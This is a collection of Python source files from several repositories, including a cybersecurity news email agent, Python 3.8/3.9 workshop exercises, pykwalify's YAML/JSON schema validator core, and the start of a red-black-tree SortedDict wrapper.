shutil.move(os.path.join(dir_path, image_file + ".txt"),
os.path.join(dir_path, subdir, image_file + ".txt"))
except IOError as ex:
print(ex)
try:
shutil.move(os.path.join(dir_path, image_file + ".info"),
os.path.join(dir_path, subdir, image_file + ".info"))
except IOError as ex:
pass
print(" write list: {}...".format(os.path.join(dir_path, "{}_{}.lst".format(dir_path, subdir))))
with open(os.path.join(foldername, "{}_{}.lst".format(os.path.basename(dir_path), subdir)), "w") as fobj:
fobj.writelines([os.path.join(dir_path, subdir, x) + "\n" for x in part_list])
if __name__ == '__main__':
main(sys.argv)
``` |
{
"source": "JochiRaider/Cybersecrity_News_Agent",
"score": 2
} |
#### File: JochiRaider/Cybersecrity_News_Agent/main.py
```python
import re
import datetime
import ezgmail
from gmail_formatter import ComposeEmail
from news_scraper import NewsScrapers
from xkcd_scraper import xkcd_rng_scraper
from cve_agent import cve_api_agent
def main():
comic = xkcd_rng_scraper()
cve_list = cve_api_agent()
news_art_list = NewsScrapers().news_call()
out_email = ComposeEmail(xkcd_list=comic,cve_list=cve_list,news_art_list=news_art_list).final_draft()
today_date = re.compile(r'^2[0-9]{3}.[0-9]{2}.[0-9]{2}').search(str(datetime.datetime.now())).group()
local_name = f'nes_email_{today_date}.html'
with open(local_name,'w') as f:
f.write(out_email)
out_subject = f'News email service for {today_date}'
ezgmail.send('[email protected]', out_subject, out_email, mimeSubtype='html')
if __name__=='__main__':
main()
``` |
{
"source": "jochman/py38workshop",
"score": 3
} |
#### File: py38workshop/3.8/exercise.py
```python
forms = [
{"severity": 6, "factor": 1, "active": 2},
{"severity": 6, "factor": 2, "active": 4},
{"severity": 6, "factor": 3, "active": 0},
]
def calc(severity, factor, divider):
return severity * (factor / divider)
readable = ""
for form in forms:
divider = form["active"]
if divider == 0:
divider = 1
severity = form["severity"]
if severity < 7:
severity = 5
factor = form["factor"]
calculated_severity = calc(severity, divider=divider, factor=factor)
readable += f"calculated_severity={calculated_severity}\n"
return_outputs(readable)
```
#### File: py38workshop/3.8/walrus.py
```python
response = {"username": "username", "password": "<PASSWORD>"}
db = list()
def add_user(user_obj):
password = response.get("password")
if len(password) < 5:
return "Password is shorter than 5 characters."
else:
db.append(user_obj)
return "User has been added."
print(add_user(response))
print(db)
```
#### File: py38workshop/3.9/hints.py
```python
from typing import Dict, Union
def backstreet_singer(obj: Union[Dict[str, str], str]):
if isinstance(obj, str):
print(obj)
else:
flag = False
for key, value in obj.items():
if flag := value == "Tell me why":
key, value = value, key
print(key)
print(value)
if flag:
print("I want it that way")
print("\n")
if __name__ == "__main__":
backstreet_singer("Yeah\nOh yeah")
``` |
{
"source": "jochman/pykwalify",
"score": 2
} |
#### File: pykwalify/pykwalify/core.py
```python
import datetime
import json
import logging
import os
import re
import sys
import traceback
import time
from io import open
from importlib.machinery import SourceFileLoader
# pyKwalify imports
import pykwalify
from pykwalify.compat import unicode, nativestr, basestring
from pykwalify.errors import CoreError, SchemaError, NotMappingError, NotSequenceError
from pykwalify.rule import Rule
from pykwalify.types import is_scalar, is_string, tt
# 3rd party imports
from dateutil.parser import parse
from pykwalify.compat import yml
from ruamel.yaml.constructor import Constructor
log = logging.getLogger(__name__)
class Core(object):
""" Core class of pyKwalify """
def __init__(self, source_file=None, schema_files=None, source_data=None, schema_data=None, extensions=None, strict_rule_validation=False,
fix_ruby_style_regex=False, allow_assertions=False, file_encoding=None, schema_file_obj=None, data_file_obj=None):
"""
:param extensions:
List of paths to python files that should be imported and available via 'func' keywork.
This list of extensions can be set manually or they should be provided by the `--extension`
flag from the cli. This list should not contain files specified by the `extensions` list keyword
that can be defined at the top level of the schema.
"""
if schema_files is None:
schema_files = []
if extensions is None:
extensions = []
log.debug(u"source_file: %s", source_file)
log.debug(u"schema_file: %s", schema_files)
log.debug(u"source_data: %s", source_data)
log.debug(u"schema_data: %s", schema_data)
log.debug(u"extension files: %s", extensions)
self.source = None
self.schema = None
self.validation_errors = None
self.validation_errors_exceptions = None
self.root_rule = None
self.extensions = extensions
self.errors = []
self.strict_rule_validation = strict_rule_validation
self.fix_ruby_style_regex = fix_ruby_style_regex
self.allow_assertions = allow_assertions
# Patch in all the normal python types into the yaml load instance so we can use all the
# internal python types in the yaml loading.
yml.constructor.add_constructor('tag:yaml.org,2002:python/bool', Constructor.construct_yaml_bool)
yml.constructor.add_constructor('tag:yaml.org,2002:python/complex', Constructor.construct_python_complex)
yml.constructor.add_constructor('tag:yaml.org,2002:python/dict', Constructor.construct_yaml_map)
yml.constructor.add_constructor('tag:yaml.org,2002:python/float', Constructor.construct_yaml_float)
yml.constructor.add_constructor('tag:yaml.org,2002:python/int', Constructor.construct_yaml_int)
yml.constructor.add_constructor('tag:yaml.org,2002:python/list', Constructor.construct_yaml_seq)
yml.constructor.add_constructor('tag:yaml.org,2002:python/long', Constructor.construct_python_long)
yml.constructor.add_constructor('tag:yaml.org,2002:python/none', Constructor.construct_yaml_null)
yml.constructor.add_constructor('tag:yaml.org,2002:python/str', Constructor.construct_python_str)
yml.constructor.add_constructor('tag:yaml.org,2002:python/tuple', Constructor.construct_python_tuple)
yml.constructor.add_constructor('tag:yaml.org,2002:python/unicode', Constructor.construct_python_unicode)
if data_file_obj:
try:
self.source = yml.load(data_file_obj.read())
except Exception as e:
raise CoreError("Unable to load data_file_obj input")
if schema_file_obj:
try:
self.schema = yml.load(schema_file_obj.read())
except Exception as e:
raise CoreError("Unable to load schema_file_obj")
if source_file is not None:
if not os.path.exists(source_file):
raise CoreError(u"Provided source_file do not exists on disk: {0}".format(source_file))
with open(source_file, "r", encoding=file_encoding) as stream:
if source_file.endswith(".json"):
self.source = json.load(stream)
elif source_file.endswith(".yaml") or source_file.endswith('.yml'):
self.source = yml.load(stream)
else:
raise CoreError(u"Unable to load source_file. Unknown file format of specified file path: {0}".format(source_file))
if not isinstance(schema_files, list):
raise CoreError(u"schema_files must be of list type")
# Merge all schema files into one single file for easy parsing
if len(schema_files) > 0:
schema_data = {}
for f in schema_files:
if not os.path.exists(f):
raise CoreError(u"Provided source_file do not exists on disk : {0}".format(f))
with open(f, "r", encoding=file_encoding) as stream:
if f.endswith(".json"):
data = json.load(stream)
elif f.endswith(".yaml") or f.endswith(".yml"):
data = yml.load(stream)
if not data:
raise CoreError(u"No data loaded from file : {0}".format(f))
else:
raise CoreError(u"Unable to load file : {0} : Unknown file format. Supported file endings is [.json, .yaml, .yml]")
for key in data.keys():
if key in schema_data.keys():
raise CoreError(u"Parsed key : {0} : two times in schema files...".format(key))
schema_data = dict(schema_data, **data)
self.schema = schema_data
# Nothing was loaded so try the source_data variable
if self.source is None:
log.debug(u"No source file loaded, trying source data variable")
self.source = source_data
if self.schema is None:
log.debug(u"No schema file loaded, trying schema data variable")
self.schema = schema_data
# Test if anything was loaded
if self.source is None:
raise CoreError(u"No source file/data was loaded")
if self.schema is None:
raise CoreError(u"No schema file/data was loaded")
# Merge any extensions defined in the schema with the provided list of extensions from the cli
for f in self.schema.get('extensions', []):
self.extensions.append(f)
if not isinstance(self.extensions, list) and all(isinstance(e, str) for e in self.extensions):
raise CoreError(u"Specified extensions must be a list of file paths")
self._load_extensions()
if self.strict_rule_validation:
log.info("Using strict rule keywords validation...")
def _load_extensions(self):
"""
Load all extension files into the namespace pykwalify.ext
"""
log.debug(u"loading all extensions : %s", self.extensions)
self.loaded_extensions = []
for f in self.extensions:
if not os.path.isabs(f):
f = os.path.abspath(f)
if not os.path.exists(f):
raise CoreError(u"Extension file: {0} not found on disk".format(f))
self.loaded_extensions.append(SourceFileLoader("", f).load_module())
log.debug(self.loaded_extensions)
log.debug([dir(m) for m in self.loaded_extensions])
def validate(self, raise_exception=True):
"""
"""
log.debug(u"starting core")
self._start_validate(self.source)
self.validation_errors = [unicode(error) for error in self.errors]
self.validation_errors_exceptions = self.errors
if self.errors is None or len(self.errors) == 0:
log.info(u"validation.valid")
else:
log.error(u"validation.invalid")
log.error(u" --- All found errors ---")
log.error(self.validation_errors)
if raise_exception:
raise SchemaError(u"Schema validation failed:\n - {error_msg}.".format(
error_msg=u'.\n - '.join(self.validation_errors)))
else:
log.error(u"Errors found but will not raise exception...")
# Return validated data
return self.source
def _start_validate(self, value=None):
"""
"""
path = ""
self.errors = []
done = []
s = {}
# Look for schema; tags so they can be parsed before the root rule is parsed
for k, v in self.schema.items():
if k.startswith("schema;"):
log.debug(u"Found partial schema; : %s", v)
r = Rule(schema=v)
log.debug(u" Partial schema : %s", r)
pykwalify.partial_schemas[k.split(";", 1)[1]] = r
else:
# readd all items that is not schema; so they can be parsed
s[k] = v
self.schema = s
log.debug(u"Building root rule object")
root_rule = Rule(schema=self.schema)
self.root_rule = root_rule
log.debug(u"Done building root rule")
log.debug(u"Root rule: %s", self.root_rule)
self._validate(value, root_rule, path, done)
def _validate(self, value, rule, path, done):
"""
"""
log.debug(u"Core validate")
log.debug(u" Root validate : Rule: %s", rule)
log.debug(u" Root validate : Rule_type: %s", rule.type)
log.debug(u" Root validate : Seq: %s", rule.sequence)
log.debug(u" Root validate : Map: %s", rule.mapping)
log.debug(u" Root validate : Done: %s", done)
if rule.required and value is None and not rule.type == 'none':
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"required.novalue : '{path}'",
path=path,
value=value.encode('unicode_escape') if value else value,
))
return
if not rule.nullable and value is None and not rule.type == 'none':
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"nullable.novalue : '{path}'",
path=path,
value=value.encode('unicode_escape') if value else value,
))
return
log.debug(u" ? ValidateRule: %s", rule)
if rule.include_name is not None:
self._validate_include(value, rule, path, done=None)
elif rule.sequence is not None:
self._validate_sequence(value, rule, path, done=None)
elif rule.mapping is not None or rule.allowempty_map:
self._validate_mapping(value, rule, path, done=None)
else:
self._validate_scalar(value, rule, path, done=None)
def _handle_func(self, value, rule, path, done=None):
"""
Helper function that should check if func is specified for this rule and
then handle it for all cases in a generic way.
"""
func = rule.func
# func keyword is not defined so nothing to do
if not func:
return
found_method = False
for extension in self.loaded_extensions:
method = getattr(extension, func, None)
if method:
found_method = True
# No exception will should be caught. If one is raised it should bubble up all the way.
ret = method(value, rule, path)
if ret is not True and ret is not None:
msg = '%s. Path: {path}' % unicode(ret)
self.errors.append(SchemaError.SchemaErrorEntry(
msg=msg,
path=path,
value=None))
# If False or None or some other object that is interpreted as False
if not ret:
raise CoreError(u"Error when running extension function : {0}".format(func))
# Only run the first matched function. Sinc loading order is determined
# it should be easy to determine which file is used before others
break
if not found_method:
raise CoreError(u"Did not find method '{0}' in any loaded extension file".format(func))
def _validate_include(self, value, rule, path, done=None):
"""
"""
# TODO: It is difficult to get a good test case to trigger this if case
if rule.include_name is None:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u'Include name not valid',
path=path,
value=value.encode('unicode_escape')))
return
include_name = rule.include_name
partial_schema_rule = pykwalify.partial_schemas.get(include_name)
if not partial_schema_rule:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Cannot find partial schema with name '{include_name}'. Existing partial schemas: '{existing_schemas}'. Path: '{path}'",
path=path,
value=value,
include_name=include_name,
existing_schemas=", ".join(sorted(pykwalify.partial_schemas.keys()))))
return
self._validate(value, partial_schema_rule, path, done)
def _validate_sequence(self, value, rule, path, done=None):
"""
"""
log.debug(u"Core Validate sequence")
log.debug(u" Sequence : Data: %s", value)
log.debug(u" Sequence : Rule: %s", rule)
log.debug(u" Sequence : RuleType: %s", rule.type)
log.debug(u" Sequence : Path: %s", path)
log.debug(u" Sequence : Seq: %s", rule.sequence)
log.debug(u" Sequence : Map: %s", rule.mapping)
if len(rule.sequence) <= 0:
raise CoreError(u"Sequence must contains atleast one item : {0}".format(path))
if value is None:
log.debug(u" * Core seq: sequence data is None")
return
if not isinstance(value, list):
if isinstance(value, str):
value = value.encode('unicode_escape')
self.errors.append(SchemaError.SchemaErrorEntry(
u"Value '{value}' is not a list. Value path: '{path}'",
path,
value,
))
return
# Handle 'func' argument on this sequence
self._handle_func(value, rule, path, done)
ok_values = []
error_tracker = []
unique_errors = {}
map_unique_errors = {}
for i, item in enumerate(value):
processed = []
for r in rule.sequence:
tmp_errors = []
try:
# Create a sub core object to enable error tracking that do not
# collide with this Core objects errors
tmp_core = Core(source_data={}, schema_data={})
tmp_core.fix_ruby_style_regex = self.fix_ruby_style_regex
tmp_core.allow_assertions = self.allow_assertions
tmp_core.strict_rule_validation = self.strict_rule_validation
tmp_core.loaded_extensions = self.loaded_extensions
tmp_core._validate(item, r, "{0}/{1}".format(path, i), done)
tmp_errors = tmp_core.errors
except NotMappingError:
# For example: If one type was specified as 'map' but data
# was 'str' a exception will be thrown but we should ignore it
pass
except NotSequenceError:
# For example: If one type was specified as 'seq' but data
# was 'str' a exception will be thrown but we shold ignore it
pass
processed.append(tmp_errors)
if r.type == "map":
log.debug(u" * Found map inside sequence")
unique_keys = []
if r.mapping is None:
log.debug(u" + No rule to apply, prolly because of allowempty: True")
return
for k, _rule in r.mapping.items():
log.debug(u" * Key: %s", k)
log.debug(u" * Rule: %s", _rule)
if _rule.unique or _rule.ident:
unique_keys.append(k)
if len(unique_keys) > 0:
for v in unique_keys:
table = {}
for j, V in enumerate(value):
# If key do not exists it should be ignored by unique because that is not a broken constraint
val = V.get(v, None)
if val is None:
continue
if val in table:
curr_path = "{0}/{1}/{2}".format(path, j, v)
prev_path = "{0}/{1}/{2}".format(path, table[val], v)
s = SchemaError.SchemaErrorEntry(
msg=u"Value '{duplicate}' is not unique. Previous path: '{prev_path}'. Path: '{path}'",
path=curr_path,
value=value,
duplicate=val,
prev_path=prev_path,
)
map_unique_errors[s.__repr__()] = s
else:
table[val] = j
elif r.unique:
log.debug(u" * Found unique value in sequence")
table = {}
for j, val in enumerate(value):
if val is None:
continue
if val in table:
curr_path = "{0}/{1}".format(path, j)
prev_path = "{0}/{1}".format(path, table[val])
s = SchemaError.SchemaErrorEntry(
msg=u"Value '{duplicate}' is not unique. Previous path: '{prev_path}'. Path: '{path}'",
path=curr_path,
value=value,
duplicate=val,
prev_path=prev_path,
)
unique_errors[s.__repr__()] = s
else:
table[val] = j
error_tracker.append(processed)
no_errors = []
for _errors in processed:
no_errors.append(len(_errors) == 0)
if rule.matching == "any":
log.debug(u" * any rule %s", True in no_errors)
ok_values.append(True in no_errors)
elif rule.matching == "all":
log.debug(u" * all rule".format(all(no_errors)))
ok_values.append(all(no_errors))
elif rule.matching == "*":
log.debug(u" * star rule", "...")
ok_values.append(True)
for _error in unique_errors:
self.errors.append(_error)
for _error in map_unique_errors:
self.errors.append(_error)
log.debug(u" * ok : %s", ok_values)
# All values must pass the validation, otherwise add the parsed errors
# to the global error list and throw up some error.
if not all(ok_values):
# Ignore checking for '*' type because it should allways go through
if rule.matching == "any":
log.debug(u" * Value: %s did not validate against one or more sequence schemas", value)
elif rule.matching == "all":
log.debug(u" * Value: %s did not validate against all possible sequence schemas", value)
for i, is_ok in enumerate(ok_values):
if not is_ok:
for error in error_tracker[i]:
for e in error:
self.errors.append(e)
log.debug(u" * Core seq: validation recursivley done...")
if rule.range is not None:
rr = rule.range
self._validate_range(
rr.get("max"),
rr.get("min"),
rr.get("max-ex"),
rr.get("min-ex"),
len(value),
path,
"seq",
)
def _validate_mapping(self, value, rule, path, done=None):
"""
"""
log.debug(u"Validate mapping")
log.debug(u" Mapping : Data: %s", value)
log.debug(u" Mapping : Rule: %s", rule)
log.debug(u" Mapping : RuleType: %s", rule.type)
log.debug(u" Mapping : Path: %s", path)
log.debug(u" Mapping : Seq: %s", rule.sequence)
log.debug(u" Mapping : Map: %s", rule.mapping)
if not isinstance(value, dict):
self.errors.append(SchemaError.SchemaErrorEntry(
u"Value '{value}' is not a dict. Value path: '{path}'",
path,
value,
))
return
if rule.mapping is None:
log.debug(u" + No rule to apply, prolly because of allowempty: True")
return
# Handle 'func' argument on this mapping
self._handle_func(value, rule, path, done)
m = rule.mapping
log.debug(u" Mapping: Rule-Mapping: %s", m)
if rule.range is not None:
r = rule.range
self._validate_range(
r.get("max"),
r.get("min"),
r.get("max-ex"),
r.get("min-ex"),
len(value),
path,
"map",
)
for k, rr in m.items():
# Handle if the value of the key contains a include keyword
if rr.include_name is not None:
include_name = rr.include_name
partial_schema_rule = pykwalify.partial_schemas.get(include_name)
if not partial_schema_rule:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Cannot find partial schema with name '{include_name}'. Existing partial schemas: '{existing_schemas}'. Path: '{path}'",
path=path,
value=value,
include_name=include_name,
existing_schemas=", ".join(sorted(pykwalify.partial_schemas.keys()))))
return
rr = partial_schema_rule
# Find out if this is a regex rule
is_regex_rule = False
required_regex = ""
for regex_rule in rule.regex_mappings:
if k == "regex;({})".format(regex_rule.map_regex_rule) or k == "re;({})".format(regex_rule.map_regex_rule):
is_regex_rule = True
required_regex = regex_rule.map_regex_rule
# Check for the presense of the required key
is_present = False
if not is_regex_rule:
is_present = k in value
else:
is_present = any([re.search(required_regex, v) for v in value])
# Specifying =: as key is considered the "default" if no other keys match
if rr.required and not is_present and k != "=":
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Cannot find required key '{key}'. Path: '{path}'",
path=path,
value=value,
key=k))
if k not in value and rr.default is not None:
value[k] = rr.default
for k, v in value.items():
# If no other case was a match, check if a default mapping is valid/present and use
# that one instead
r = m.get(k, m.get('='))
log.debug(u" Mapping-value : %s", m)
log.debug(u" Mapping-value : %s %s", k, v)
log.debug(u" Mapping-value : %s", r)
regex_mappings = [(regex_rule, re.search(regex_rule.map_regex_rule, str(k))) for regex_rule in rule.regex_mappings]
log.debug(u" Mapping-value: Mapping Regex matches: %s", regex_mappings)
if r is not None:
# validate recursively
log.debug(u" Mapping-value: Core Map: validate recursively: %s", r)
self._validate(v, r, u"{0}/{1}".format(path, k), done)
elif any(regex_mappings):
sub_regex_result = []
# Found at least one that matches a mapping regex
for mm in regex_mappings:
if mm[1]:
log.debug(u" Mapping-value: Matching regex patter: %s", mm[0])
self._validate(v, mm[0], "{0}/{1}".format(path, k), done)
sub_regex_result.append(True)
else:
sub_regex_result.append(False)
if rule.matching_rule == "any":
if any(sub_regex_result):
log.debug(u" Mapping-value: Matched at least one regex")
else:
log.debug(u" Mapping-value: No regex matched")
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Key '{key}' does not match any regex '{regex}'. Path: '{path}'",
path=path,
value=value,
key=k,
regex="' or '".join(sorted([mm[0].map_regex_rule for mm in regex_mappings]))))
elif rule.matching_rule == "all":
if all(sub_regex_result):
log.debug(u" Mapping-value: Matched all regex rules")
else:
log.debug(u" Mapping-value: Did not match all regex rules")
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Key '{key}' does not match all regex '{regex}'. Path: '{path}'",
path=path,
value=value,
key=k,
regex="' and '".join(sorted([mm[0].map_regex_rule for mm in regex_mappings]))))
else:
log.debug(u" Mapping-value: No mapping rule defined")
else:
if not rule.allowempty_map:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Key '{key}' was not defined. Path: '{path}'",
path=path,
value=value,
key=k))
def _validate_scalar(self, value, rule, path, done=None):
"""
"""
log.debug(u"Validate scalar")
log.debug(u" Scalar : Value : %s", value)
log.debug(u" Scalar : Rule : %s", rule)
log.debug(u" Scalar : RuleType : %s", rule.type)
log.debug(u" Scalar : Path %s", path)
# Handle 'func' argument on this scalar
self._handle_func(value, rule, path, done)
if rule.assertion is not None:
self._validate_assert(rule, value, path)
if value is None:
return True
if rule.enum is not None and value not in rule.enum:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Enum '{value}' does not exist. Path: '{path}' Enum: {enum_values}",
path=path,
value=nativestr(value) if tt['str'](value) else value,
enum_values=rule.enum,
))
# Set default value
if rule.default and value is None:
value = rule.default
if not self._validate_scalar_type(value, rule.type, path):
return
if value is None:
return
if rule.pattern is not None:
#
# Try to trim away the surrounding slashes around ruby style /<regex>/ if they are defined.
# This is a quirk from ruby that they define regex patterns with surrounding slashes.
# Docs on how ruby regex works can be found here: https://ruby-doc.org/core-2.4.0/Regexp.html
# The original ruby implementation uses this code to validate patterns
# unless value.to_s =~ rule.regexp
# Becuase python do not work with surrounding slashes we have to trim them away in order to make the regex work
#
if rule.pattern.startswith('/') and rule.pattern.endswith('/') and self.fix_ruby_style_regex:
rule.pattern = rule.pattern[1:-1]
log.debug("Trimming slashes around ruby style regex. New pattern value: '{0}'".format(rule.pattern))
try:
log.debug("Matching pattern '{0}' to regex '{1}".format(rule.pattern, value))
res = re.match(rule.pattern, value, re.UNICODE)
except TypeError:
res = None
if res is None: # Not matching
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Value '{value}' does not match pattern '{pattern}'. Path: '{path}'",
path=path,
value=nativestr(str(value)),
pattern=rule._pattern))
else:
log.debug("Pattern matched...")
if rule.range is not None:
if not is_scalar(value):
raise CoreError(u"value is not a valid scalar")
r = rule.range
try:
v = len(value)
value = v
except Exception:
pass
self._validate_range(
r.get("max"),
r.get("min"),
r.get("max-ex"),
r.get("min-ex"),
value,
path,
"scalar",
)
if rule.length is not None:
self._validate_length(
rule.length,
value,
path,
'scalar',
)
# Validate timestamp
if rule.type == "timestamp":
self._validate_scalar_timestamp(value, path)
if rule.type == "date":
if not is_scalar(value):
raise CoreError(u'value is not a valid scalar')
date_format = rule.format
self._validate_scalar_date(value, date_format, path)
def _validate_scalar_timestamp(self, timestamp_value, path):
"""
"""
def _check_int_timestamp_boundaries(timestamp):
"""
"""
if timestamp < 1:
# Timestamp integers can't be negative
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Integer value of timestamp can't be below 0",
path=path,
value=timestamp,
timestamp=str(timestamp),
))
if timestamp > 2147483647:
# Timestamp integers can't be above the upper limit of
# 32 bit integers
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Integer value of timestamp can't be above 2147483647",
path=path,
value=timestamp,
timestamp=str(timestamp),
))
if isinstance(timestamp_value, (int, float)):
_check_int_timestamp_boundaries(timestamp_value)
elif isinstance(timestamp_value, datetime.datetime):
# Datetime objects currently have nothing to validate.
# In the future, more options will be added to datetime validation
pass
elif isinstance(timestamp_value, basestring):
v = timestamp_value.strip()
# parse("") will give a valid date but it should not be
# considered a valid timestamp
if v == "":
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Timestamp value is empty. Path: '{path}'",
path=path,
value=nativestr(timestamp_value),
timestamp=nativestr(timestamp_value)))
else:
# A string can contain a valid unit timestamp integer. Check if it is valid and validate it
try:
int_v = int(v)
_check_int_timestamp_boundaries(int_v)
except ValueError:
# Just continue to parse it as a timestamp
try:
parse(timestamp_value)
# If it can be parsed then it is valid
except Exception:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Timestamp: '{timestamp}'' is invalid. Path: '{path}'",
path=path,
value=nativestr(timestamp_value),
timestamp=nativestr(timestamp_value)))
else:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Not a valid timestamp",
path=path,
value=timestamp_value,
timestamp=timestamp_value,
))
def _validate_scalar_date(self, date_value, date_formats, path):
log.debug(u"Validate date : %(value)s : %(format)s : %(path)s" % {
'value': date_value,
'format': date_formats,
'path': path,
})
if isinstance(date_value, str):
# If a date_format is specefied then use strptime on all formats
# If no date_format is specefied then use dateutils.parse() to test the value
log.debug(date_formats)
if date_formats:
# Run through all date_formats and it is valid if atleast one of them passed time.strptime() parsing
valid = False
for date_format in date_formats:
try:
time.strptime(date_value, date_format)
valid = True
except ValueError:
pass
if not valid:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Not a valid date: {value} format: {format}. Path: '{path}'",
path=path,
value=date_value,
format=date_format,
))
return
else:
try:
parse(date_value)
except ValueError:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Not a valid date: {value} Path: '{path}'",
path=path,
value=date_value,
))
elif isinstance(date_value, (datetime.date, datetime.datetime)):
# If the object already is a datetime or date object it passes validation
pass
else:
# If value is any other type then raise error
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Not a valid date: {value} date must be a string or a datetime.date not a '{type}'",
path=path,
value=date_value,
type=type(date_value).__name__,
))
def _validate_length(self, rule, value, path, prefix):
if not is_string(value):
raise CoreError("Value: '{0}' must be a 'str' type for length check to work".format(value))
value_length = len(str(value))
max_, min_, max_ex, min_ex = rule.get('max'), rule.get('min'), rule.get('max-ex'), rule.get('min-ex')
log.debug(
u"Validate length : %s : %s : %s : %s : %s : %s",
max, min, max_ex, min_ex, value, path,
)
if max_ is not None and max_ < value_length:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Value: '{value_str}' has length of '{value}', greater than max limit '{max_}'. Path: '{path}'",
value_str=value,
path=path,
value=len(value),
prefix=prefix,
max_=max_))
if min_ is not None and min_ > value_length:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Value: '{value_str}' has length of '{value}', greater than min limit '{min_}'. Path: '{path}'",
value_str=value,
path=path,
value=len(value),
prefix=prefix,
min_=min_))
if max_ex is not None and max_ex <= value_length:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Value: '{value_str}' has length of '{value}', greater than max_ex limit '{max_ex}'. Path: '{path}'",
value_str=value,
path=path,
value=len(value),
prefix=prefix,
max_ex=max_ex))
if min_ex is not None and min_ex >= value_length:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Value: '{value_str}' has length of '{value}', greater than min_ex limit '{min_ex}'. Path: '{path}'",
value_str=value,
path=path,
value=len(value),
prefix=prefix,
min_ex=min_ex))
def _validate_assert(self, rule, value, path):
if not self.allow_assertions:
raise CoreError('To allow usage of keyword "assert" you must use cli flag "--allow-assertions" or set the keyword "allow_assert" in Core class')
# Small hack to make strings work as a value.
if isinstance(value, str):
assert_value_str = '"{0}"'.format(value)
else:
assert_value_str = '{0}'.format(value)
assertion_string = "val = {0}; assert {1}".format(assert_value_str, rule.assertion)
try:
exec(assertion_string, {}, {})
except AssertionError:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Value: '{0}' assertion expression failed ({1})".format(value, rule.assertion),
path=path,
value=value,
))
return
except Exception as err:
error_class = err.__class__.__name__
detail = err.args[0]
cl, exc, tb = sys.exc_info()
line_number = traceback.extract_tb(tb)[-1][1]
raise Exception("Unknown error during assertion\n{0}\n{1}\n{2}\n{3}\n{4}\n{5}".format(
error_class, detail, cl, exc, tb, line_number,
))
def _validate_range(self, max_, min_, max_ex, min_ex, value, path, prefix):
"""
Validate that value is within range values.
"""
if not isinstance(value, int) and not isinstance(value, float):
raise CoreError("Value must be a integer type")
log.debug(
u"Validate range : %s : %s : %s : %s : %s : %s",
max_,
min_,
max_ex,
min_ex,
value,
path,
)
if max_ is not None and max_ < value:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Type '{prefix}' has size of '{value}', greater than max limit '{max_}'. Path: '{path}'",
path=path,
value=nativestr(value) if tt['str'](value) else value,
prefix=prefix,
max_=max_))
if min_ is not None and min_ > value:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Type '{prefix}' has size of '{value}', less than min limit '{min_}'. Path: '{path}'",
path=path,
value=nativestr(value) if tt['str'](value) else value,
prefix=prefix,
min_=min_))
if max_ex is not None and max_ex <= value:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Type '{prefix}' has size of '{value}', greater than or equals to max limit(exclusive) '{max_ex}'. Path: '{path}'",
path=path,
value=nativestr(value) if tt['str'](value) else value,
prefix=prefix,
max_ex=max_ex))
if min_ex is not None and min_ex >= value:
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Type '{prefix}' has size of '{value}', less than or equals to min limit(exclusive) '{min_ex}'. Path: '{path}'",
path=path,
value=nativestr(value) if tt['str'](value) else value,
prefix=prefix,
min_ex=min_ex))
def _validate_scalar_type(self, value, t, path):
"""
"""
log.debug(u" # Core scalar: validating scalar type : %s", t)
log.debug(u" # Core scalar: scalar type: %s", type(value))
try:
if not tt[t](value):
self.errors.append(SchemaError.SchemaErrorEntry(
msg=u"Value '{value}' is not of type '{scalar_type}'. Path: '{path}'",
path=path,
value=unicode(value) if tt['str'](value) else value,
scalar_type=t))
return False
return True
except KeyError as e:
# Type not found in valid types mapping
log.debug(e)
raise CoreError(u"Unknown type check: {0!s} : {1!s} : {2!s}".format(path, value, t))
``` |
{
"source": "jochman/python-crbtree",
"score": 3
} |
#### File: python-crbtree/crbtree/__init__.py
```python
import collections
from crbtree._rbtree import ffi, lib
__all__ = ['SortedDict']
Item = collections.namedtuple('Item', ('key', 'value'))
class SortedDict(collections.MutableMapping):
"A sorted dictionary, backed by a red-black tree."
def __init__(self, *args, **kwargs):
self._rbtree = lib.rb_tree_create(lib.rb_tree_node_compare)
# This allows us to get the SortedDict Python object from a node
# removal/dealloc callback.
self._self_handle = ffi.new_handle(self)
self._rbtree.info = self._self_handle
# Track the FFI pointers to Items so they don't get garbage collected.
self._handles = set()
for key, value in kwargs.items():
self[key] = value
if args:
try:
if isinstance(args[0], list):
for item in args[0]:
self[item[0]] = item[1]
elif isinstance(args[0], dict):
for key, value in args[0].items():
self[key] = value
else:
raise ValueError
except Exception:
raise TypeError(f'Can\'t insert type {type(args[0])}')
def __del__(self):
lib.rb_tree_dealloc(self._rbtree, ffi.addressof(
lib, 'rb_tree_node_dealloc_cb'))
def __len__(self):
return lib.rb_tree_size(self._rbtree)
def _get(self, key):
item = Item(key, None) # Create item
item_p = ffi.new_handle(item) # Get its pointer
result_p = lib.rb_tree_find(
self._rbtree, item_p) # Send to command to c
if result_p == ffi.NULL: # Compare to C NULL
return (False, None)
return (True, ffi.from_handle(result_p).value)
def __contains__(self, key):
return self._get(key)[0]
def __setitem__(self, key, value):
if key in self:
del self[key]
item = Item(key, value)
item_p = ffi.new_handle(item)
